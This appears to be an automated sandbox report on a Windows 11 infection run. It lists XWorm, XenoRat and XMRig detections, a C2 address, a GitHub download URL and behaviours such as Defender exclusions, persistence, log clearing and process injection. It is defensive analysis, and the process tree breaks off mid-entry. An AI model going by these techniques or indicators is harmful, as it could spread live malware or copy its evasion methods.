Analysis
max time kernel: 99s
max time network: 281s
platform: windows11-21h2_x64
resource: win11-20250313-en
resource tags: arch:x64 arch:x86 image:win11-20250313-en locale:en-us os:windows11-21h2-x64 system
submitted: 23/03/2025, 16:26
Static task: static1
URLScan task: urlscan1
General
Malware Config
Extracted
family: xworm
version: 5.0
C2: 217.195.153.81:50002
install_file: Mason.exe
Signatures
Asyncrat family
Detect XenoRat Payload (2 IoCs)
resource  yara_rule
behavioral1/files/0x001a00000002b24b-476.dat  family_xenorat
behavioral1/memory/5336-653-0x00000000009C0000-0x00000000009E6000-memory.dmp  family_xenorat
Detect Xworm Payload (8 IoCs)
resource  yara_rule
behavioral1/files/0x001e00000002b1a0-471.dat  family_xworm
behavioral1/files/0x001900000002b249-491.dat  family_xworm
behavioral1/memory/5496-644-0x0000000000D20000-0x0000000000D4E000-memory.dmp  family_xworm
behavioral1/memory/5616-722-0x0000016D4BAC0000-0x0000016D4BB00000-memory.dmp  family_xworm
behavioral1/memory/5616-1008-0x0000016D662A0000-0x0000016D662AE000-memory.dmp  family_xworm
behavioral1/memory/1200-1446-0x0000000000F60000-0x0000000000F8E000-memory.dmp  family_xworm
behavioral1/memory/5484-1655-0x0000000000880000-0x00000000008AE000-memory.dmp  family_xworm
behavioral1/memory/6108-2245-0x00000000008A0000-0x00000000008CE000-memory.dmp  family_xworm
Suspicious use of NtCreateProcessExOtherParentProcess (1 IoCs)
description  pid  Process  procid_target
PID 1676 created 2500  1676  WerFault.exe  177
Suspicious use of NtCreateUserProcessOtherParentProcess (23 IoCs)
description  pid  Process  procid_target  (repeated entries collapsed)
PID 6140 created 3280  6140  new.exe  52  (4 entries)
PID 3300 created 3280  3300  updater.exe  52  (5 entries)
PID 700 created 3280  700  testo.exe  52  (4 entries)
PID 5936 created 3280  5936  Best.exe  52  (3 entries)
PID 4468 created 2500  4468  svchost.exe  177
PID 4468 created 5024  4468  svchost.exe  181
PID 4228 created 3280  4228  updater.exe  52  (4 entries)
PID 2180 created 3280  2180  testo.exe  52
Xenorat family
Xmrig family
Xworm family
XMRig Miner payload (1 IoCs)
resource  yara_rule
behavioral1/memory/3300-640-0x00007FF785140000-0x00007FF7856F8000-memory.dmp  xmrig
Command and Scripting Interpreter: PowerShell (1 TTPs, 28 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid  Process
powershell.exe (28): 1444, 796, 5300, 3948, 5568, 1960, 5480, 6040, 4576, 6000, 2192, 5412, 2404, 1376, 1744, 2584, 3328, 5460, 2836, 2008, 6120, 3128, 4724, 5140, 980, 5940, 4380, 1948
Downloads MZ/PE file (7 IoCs)
flow  pid  Process
21  5052  chrome.exe  (7 entries)
.NET Reactor protector (9 IoCs)
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource  yara_rule
behavioral1/files/0x001900000002b24d-466.dat  net_reactor
behavioral1/files/0x001e00000002b1a0-471.dat  net_reactor
behavioral1/files/0x001a00000002b24b-476.dat  net_reactor
behavioral1/memory/2148-634-0x00000000004C0000-0x0000000000510000-memory.dmp  net_reactor
behavioral1/memory/5496-644-0x0000000000D20000-0x0000000000D4E000-memory.dmp  net_reactor
behavioral1/memory/5336-653-0x00000000009C0000-0x00000000009E6000-memory.dmp  net_reactor
behavioral1/memory/1200-1446-0x0000000000F60000-0x0000000000F8E000-memory.dmp  net_reactor
behavioral1/memory/5484-1655-0x0000000000880000-0x00000000008AE000-memory.dmp  net_reactor
behavioral1/memory/6108-2245-0x00000000008A0000-0x00000000008CE000-memory.dmp  net_reactor
Executes dropped EXE (13 IoCs)
pid  Process
6140  new.exe
3300  updater.exe
700  testo.exe
2148  Winrar.exe
5496  Update.exe
5336  SecurityHealth.exe
4828  SecurityHealth.exe
2080  Winrar.exe
5616  Fresh.exe
2340  4y3ovtul.fs3.exe
5936  Best.exe
4228  updater.exe
2180  testo.exe
Indicator Removal: Clear Windows Event Logs (1 TTPs, 1 IoCs)
Clear Windows Event Logs to hide the activity of an intrusion.
description  ioc  Process
File opened for modification  C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx  svchost.exe
Adds Run key to start application (2 TTPs, 1 IoCs)
description  ioc  Process
Set value (str)  \REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhostw = "C:\\Users\\Admin\\AppData\\Roaming\\taskhostw.exe"  Update.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 6 IoCs)
flow  ioc
61  raw.githubusercontent.com
62  raw.githubusercontent.com
63  raw.githubusercontent.com
2  raw.githubusercontent.com
19  raw.githubusercontent.com
21  raw.githubusercontent.com
Power Settings (1 TTPs, 50 IoCs)
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid  Process
powercfg.exe (40): 3100, 2104, 788, 5024, 2592, 952, 3576, 5740, 5604, 1108, 2084, 5712, 1816, 4820, 4564, 2712, 4036, 4928, 2440, 4456, 5592, 2208, 2500, 5632, 5016, 1156, 3036, 6096, 1664, 3260, 5124, 3988, 3640, 980, 3324, 376, 572, 2272, 2840, 3836
cmd.exe (10): 4624, 4252, 1212, 3016, 4648, 460, 660, 1028, 4604, 3912
Drops file in System32 directory (5 IoCs)
description  ioc  Process
File opened for modification  C:\Windows\System32\Tasks\SecurityHealth  svchost.exe
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe  (3 entries)
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  powershell.exe
Suspicious use of SetThreadContext (4 IoCs)
description  pid  Process  procid_target
PID 3300 set thread context of 5312  3300  updater.exe  140
PID 3300 set thread context of 5316  3300  updater.exe  141
PID 4228 set thread context of 4344  4228  updater.exe  195
PID 4228 set thread context of 4508  4228  updater.exe  196
Drops file in Program Files directory (5 IoCs)
description  ioc  Process
File created  C:\Program Files\Google\Libs\WR64.sys  updater.exe
File created  C:\Program Files\Google\Chrome\updater.exe  Best.exe
File created  C:\Program Files\Google\Libs\WR64.sys  updater.exe
File created  C:\Program Files\Google\Chrome\updater.exe  new.exe
File created  C:\Program Files\Google\Chrome\updater.exe  testo.exe
Drops file in Windows directory (1 IoCs)
description  ioc  Process
File opened for modification  C:\Windows\SystemTemp  chrome.exe
Subvert Trust Controls: Mark-of-the-Web Bypass (1 TTPs, 7 IoCs)
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description  ioc  Process
File opened for modification  C:\Users\Admin\Downloads\Fresh.exe:Zone.Identifier  chrome.exe
File opened for modification  C:\Users\Admin\Downloads\Best.exe:Zone.Identifier  chrome.exe
File opened for modification  C:\Users\Admin\Downloads\new.exe:Zone.Identifier  chrome.exe
File opened for modification  C:\Users\Admin\Downloads\testo.exe:Zone.Identifier  chrome.exe
File opened for modification  C:\Users\Admin\Downloads\Winrar.exe:Zone.Identifier  chrome.exe
File opened for modification  C:\Users\Admin\Downloads\Update.exe:Zone.Identifier  chrome.exe
File opened for modification  C:\Users\Admin\Downloads\SecurityHealth.exe:Zone.Identifier  chrome.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 9 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc  Process
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  by: Winrar.exe, cmd.exe, schtasks.exe, cmd.exe, timeout.exe, SecurityHealth.exe, SecurityHealth.exe, Winrar.exe, schtasks.exe
Checks processor information in registry (2 TTPs, 20 IoCs)
Processor information is often read in order to detect sandboxing environments.
description  ioc  Process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier  WerFault.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  wmiprvse.exe
Key queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  wmiprvse.exe
Key opened  \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information  wmiprvse.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  wmiprvse.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  wmiprvse.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier  WerFault.exe
Key opened  \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1  WerFault.exe
Key security queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  wmiprvse.exe
Delays execution with timeout.exe (1 IoCs)
pid  Process
4636  timeout.exe
Enumerates system info in registry (2 TTPs, 7 IoCs)
description  ioc  Process
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  chrome.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  chrome.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  chrome.exe
Key opened  \REGISTRY\MACHINE\Hardware\Description\System\BIOS  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  WerFault.exe
Key opened  \REGISTRY\MACHINE\Hardware\Description\System\BIOS  WerFault.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  WerFault.exe
Modifies data under HKEY_USERS (64 IoCs; repeated entries collapsed)
description  ioc  Process
Key created by powershell.exe:
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
Set value (int) by powershell.exe:
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
Key created by chrome.exe:
\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry
Modifies registry class (1 IoCs)
description  ioc  Process
Key created  \REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings  chrome.exe
NTFS ADS (8 IoCs)
description  ioc  Process
File created  C:\Users\Admin\AppData\Local\Temp\XenoManager\SecurityHealth.exe\:Zone.Identifier:$DATA  SecurityHealth.exe
File opened for modification  C:\Users\Admin\Downloads\new.exe:Zone.Identifier  chrome.exe
File opened for modification  C:\Users\Admin\Downloads\testo.exe:Zone.Identifier  chrome.exe
File opened for modification  C:\Users\Admin\Downloads\Winrar.exe:Zone.Identifier  chrome.exe
File opened for modification  C:\Users\Admin\Downloads\Update.exe:Zone.Identifier  chrome.exe
File opened for modification  C:\Users\Admin\Downloads\SecurityHealth.exe:Zone.Identifier  chrome.exe
File opened for modification  C:\Users\Admin\Downloads\Fresh.exe:Zone.Identifier  chrome.exe
File opened for modification  C:\Users\Admin\Downloads\Best.exe:Zone.Identifier  chrome.exe
Scheduled Task/Job: Scheduled Task (1 TTPs, 8 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid  Process
4500  SCHTASKS.exe
4284  schtasks.exe
1324  schtasks.exe
3508  schtasks.exe
5124  SCHTASKS.exe
5608  SCHTASKS.exe
3828  schtasks.exe
4388  SCHTASKS.exe
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
pid  Process
5496  Update.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs; repeated entries collapsed)
pid  Process  (count)
4416  chrome.exe  (4)
6140  new.exe  (8)
1744  powershell.exe  (2)
4724  powershell.exe  (2)
1444  powershell.exe  (2)
796  powershell.exe  (2)
5140  powershell.exe  (3)
980  powershell.exe  (2)
3300  updater.exe  (10)
700  testo.exe  (8)
5316  explorer.exe  (6)
2148  Winrar.exe  (15)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (3 IoCs)
pid  Process
4416  chrome.exe  (3 entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs; repeated entries collapsed)
description  pid  Process
Token: SeShutdownPrivilege  4416  chrome.exe
Token: SeCreatePagefilePrivilege  4416  chrome.exe
(the two entries alternate for all 64 IoCs, all from 4416 chrome.exe)
Suspicious use of FindShellTrayWindow (64 IoCs)
pid  Process
4416  chrome.exe  (64 entries)
Suspicious use of SendNotifyMessage (12 IoCs)
pid  Process
4416  chrome.exe  (12 entries)
Suspicious use of SetWindowsHookEx (3 IoCs)
pid  Process
5496  Update.exe
2340  4y3ovtul.fs3.exe
2080  Winrar.exe
Suspicious use of WriteProcessMemory (64 IoCs; repeated entries collapsed)
description  pid  Process  procid_target
PID 4416 wrote to memory of 3412  4416  chrome.exe  78  (2 entries)
PID 4416 wrote to memory of 452  4416  chrome.exe  80  (repeated many times)
PID 4416 wrote to memory of 5052  4416  chrome.exe  79  (2 entries)
PID 4416 wrote to memory of 5236  4416  chrome.exe  82  (repeated many times)
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Process tree (indentation and the [N] prefix give the depth in the tree; each entry lists the image path, the command line, the signatures it triggered and its PID):

[1] C:\Windows\system32\winlogon.exe
    cmdline: winlogon.exe
    PID: 632
  [2] C:\Windows\system32\dwm.exe
      cmdline: "dwm.exe"
      PID: 420
[1] C:\Windows\system32\lsass.exe
    cmdline: C:\Windows\system32\lsass.exe
    PID: 684
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
    PID: 984
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
    PID: 456
[1] C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
    PID: 1040
[1] C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
    PID: 1048
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
    PID: 1056
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
    PID: 1184
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
    - Drops file in System32 directory
    PID: 1236
  [2] C:\Program Files\Google\Chrome\updater.exe
      cmdline: "C:\Program Files\Google\Chrome\updater.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      PID: 3300
  [2] C:\Program Files\Google\Chrome\updater.exe
      cmdline: "C:\Program Files\Google\Chrome\updater.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Drops file in Program Files directory
      PID: 4228
  [2] C:\Program Files\Google\Chrome\updater.exe
      cmdline: "C:\Program Files\Google\Chrome\updater.exe"
      PID: 1380
  [2] C:\Users\Admin\AppData\Roaming\taskhostw.exe
      cmdline: C:\Users\Admin\AppData\Roaming\taskhostw.exe
      PID: 1200
  [2] C:\Program Files\Google\Chrome\updater.exe
      cmdline: "C:\Program Files\Google\Chrome\updater.exe"
      PID: 3056
  [2] C:\Program Files\Google\Chrome\updater.exe
      cmdline: "C:\Program Files\Google\Chrome\updater.exe"
      PID: 2728
  [2] C:\Users\Admin\AppData\Roaming\taskhostw.exe
      cmdline: C:\Users\Admin\AppData\Roaming\taskhostw.exe
      PID: 6108
[1] C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
    PID: 1272
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
    PID: 1308
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
    PID: 1356
[1] C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
    - Indicator Removal: Clear Windows Event Logs
    PID: 1400
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
    PID: 1480
  [2] C:\Windows\system32\sihost.exe
      cmdline: sihost.exe
      PID: 2980
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
    PID: 1524
[1] C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
    PID: 1552
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p
    PID: 1700
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
    PID: 1712
[1] C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
    PID: 1768
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
    PID: 1840
[1] C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
    PID: 1884
[1] C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
    PID: 2024
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
    PID: 2036
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
    PID: 2060
[1] C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
    PID: 2072
[1] C:\Windows\System32\spoolsv.exe
    cmdline: C:\Windows\System32\spoolsv.exe
    PID: 2168
[1] C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
    PID: 2256
[1] C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
    PID: 2368
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
    PID: 2512
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
    PID: 2520
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p
    PID: 2556
[1] C:\Windows\sysmon.exe
    cmdline: C:\Windows\sysmon.exe
    PID: 2616
[1] C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
    PID: 2636
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
    PID: 2648
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
    PID: 2696
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
    PID: 2756
[1] C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
    PID: 3024
[1] C:\Windows\system32\wbem\unsecapp.exe
    cmdline: C:\Windows\system32\wbem\unsecapp.exe -Embedding
    PID: 2604
[1] C:\Windows\Explorer.EXE
    cmdline: C:\Windows\Explorer.EXE
    PID: 3280
  [2] C:\Program Files\Google\Chrome\Application\chrome.exe
      cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/DexterG0/XC/
      - Drops file in Windows directory
      - Enumerates system info in registry
      - Modifies data under HKEY_USERS
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory
      PID: 4416
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe8ee2dcf8,0x7ffe8ee2dd04,0x7ffe8ee2dd10
        PID: 3412
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1432,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2100 /prefetch:11
        - Downloads MZ/PE file
        PID: 5052
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1960,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1956 /prefetch:2
        PID: 452
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2336,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2348 /prefetch:13
        PID: 5236
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3220 /prefetch:1
        PID: 4764
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3232 /prefetch:1
        PID: 4772
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3792,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4308 /prefetch:9
        PID: 4988
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4648,i,3577822700543429496,1933318279859611810,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5128 /prefetch:14
        PID: 6012
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
